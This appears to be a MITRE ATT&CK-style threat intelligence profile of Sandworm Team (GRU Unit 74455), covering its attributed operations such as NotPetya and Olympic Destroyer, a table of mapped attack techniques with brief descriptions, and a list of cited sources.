Sandworm Team is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455. This group has been active since at least 2009.
In October 2020, the US indicted six GRU Unit 74455 officers associated with Sandworm Team for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide NotPetya attack, targeting of the 2017 French presidential campaign, the 2018 Olympic Destroyer attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019. Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as APT28.
Associated Group Descriptions
|Enterprise||T1087||.002||Account Discovery: Domain Account|
|.003||Account Discovery: Email Account|
|Enterprise||T1583||.001||Acquire Infrastructure: Domains||
Sandworm Team has registered domain names and created URLs that are often designed to mimic or spoof legitimate websites, such as email login pages, online file sharing and storage websites, and password reset pages.
|.004||Acquire Infrastructure: Server|
|Enterprise||T1595||.002||Active Scanning: Vulnerability Scanning|
|Enterprise||T1071||.001||Application Layer Protocol: Web Protocols|
|Enterprise||T1059||.005||Command and Scripting Interpreter: Visual Basic|
|.001||Command and Scripting Interpreter: PowerShell|
|Enterprise||T1555||.003||Credentials from Password Stores: Credentials from Web Browsers|
|Enterprise||T1132||.001||Data Encoding: Standard Encoding|
|Enterprise||T1005||Data from Local System|
|Enterprise||T1491||.002||Defacement: External Defacement|
|Enterprise||T1140||Deobfuscate/Decode Files or Information||
Sandworm Team's VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip.
|Enterprise||T1587||.001||Develop Capabilities: Malware|
|Enterprise||T1561||.002||Disk Wipe: Disk Structure Wipe|
|Enterprise||T1499||Endpoint Denial of Service|
|Enterprise||T1585||.001||Establish Accounts: Social Media Accounts|
|.002||Establish Accounts: Email Accounts|
|Enterprise||T1041||Exfiltration Over C2 Channel|
|Enterprise||T1203||Exploitation for Client Execution|
|Enterprise||T1133||External Remote Services||
Sandworm Team has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. Sandworm Team has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users.
|Enterprise||T1083||File and Directory Discovery|
|Enterprise||T1592||.002||Gather Victim Host Information: Software||
Sandworm Team has researched software code to enable supply-chain operations, most notably for the 2017 NotPetya attack. Sandworm Team also collected a list of computers using specific software as part of its targeting efforts.
|Enterprise||T1589||.003||Gather Victim Identity Information: Employee Names|
|.002||Gather Victim Identity Information: Email Addresses|
|Enterprise||T1590||.001||Gather Victim Network Information: Domain Properties|
|Enterprise||T1591||.002||Gather Victim Org Information: Business Relationships|
|Enterprise||T1070||.004||Indicator Removal on Host: File Deletion|
|Enterprise||T1105||Ingress Tool Transfer|
|Enterprise||T1056||.001||Input Capture: Keylogging|
|Enterprise||T1036||.005||Masquerading: Match Legitimate Name or Location|
|Enterprise||T1027||Obfuscated Files or Information||
Sandworm Team has used Base64 encoding within malware variants. Sandworm Team has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.
|Enterprise||T1588||.002||Obtain Capabilities: Tool||
Sandworm Team has acquired open-source tools for some of it's operations; for example it acquired Invoke-PSImage to establish an encrypted channel from a compromised host to Sandworm Team's C2 server as part of its preparation for the 2018 Winter Olympics attack.
|.006||Obtain Capabilities: Vulnerabilities||
In 2017, Sandworm Team conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport.
|Enterprise||T1003||.001||OS Credential Dumping: LSASS Memory|
|Enterprise||T1566||.001||Phishing: Spearphishing Attachment|
|.002||Phishing: Spearphishing Link|
|Enterprise||T1598||.003||Phishing for Information: Spearphishing Link|
Sandworm Team's BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally.
|Enterprise||T1219||Remote Access Software|
|Enterprise||T1018||Remote System Discovery|
|Enterprise||T1593||Search Open Websites/Domains||
Sandworm Team researched Ukraine's unique legal entity identifier (called an "EDRPOU" number), including running queries on the EDRPOU website, in preparation for the NotPetya attack. Sandworm Team has also researched third-party websites to help it craft credible spearphishing emails.
|Enterprise||T1594||Search Victim-Owned Websites|
|Enterprise||T1505||.003||Server Software Component: Web Shell|
|Enterprise||T1218||.011||Signed Binary Proxy Execution: Rundll32|
|Enterprise||T1195||.002||Supply Chain Compromise: Compromise Software Supply Chain|
|Enterprise||T1082||System Information Discovery|
|Enterprise||T1016||System Network Configuration Discovery|
|Enterprise||T1049||System Network Connections Discovery||
Sandworm Team had gathered user, IP address, and server data related to RDP sessions on a compromised host. It has also accessed network diagram files useful for understanding how a host's network was configured.
|Enterprise||T1033||System Owner/User Discovery|
|Enterprise||T1204||.002||User Execution: Malicious File|
|.001||User Execution: Malicious Link|
|Enterprise||T1102||.002||Web Service: Bidirectional Communication||
Sandworm Team has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. Sandworm Team also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.
- Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
- UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.
- Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
- Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
- Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
- NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
- Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
- Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
- Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.
- F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
- Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.
- Cherepanov, A.. (2017, July 4). Analysis of TeleBots’ cunning backdoor . Retrieved June 11, 2020.
- Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020.
- Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.
- US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020.
- Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020.
- Wu, W. (2014, October 14). An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm”. Retrieved June 18, 2020.
- Li, H. (2013, November 5). McAfee Labs Detects Zero-Day Exploit Targeting Microsoft Office. Retrieved June 18, 2020.
- ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.
- Counter Threat Research Team. (2017, June 28). NotPetya Campaign: What We Know About the Latest Global Ransomware Attack. Retrieved June 11, 2020.
- B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020.
- Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
- CrowdStrike. (2019, January). 2019 Global Threat Report. Retrieved June 10, 2020.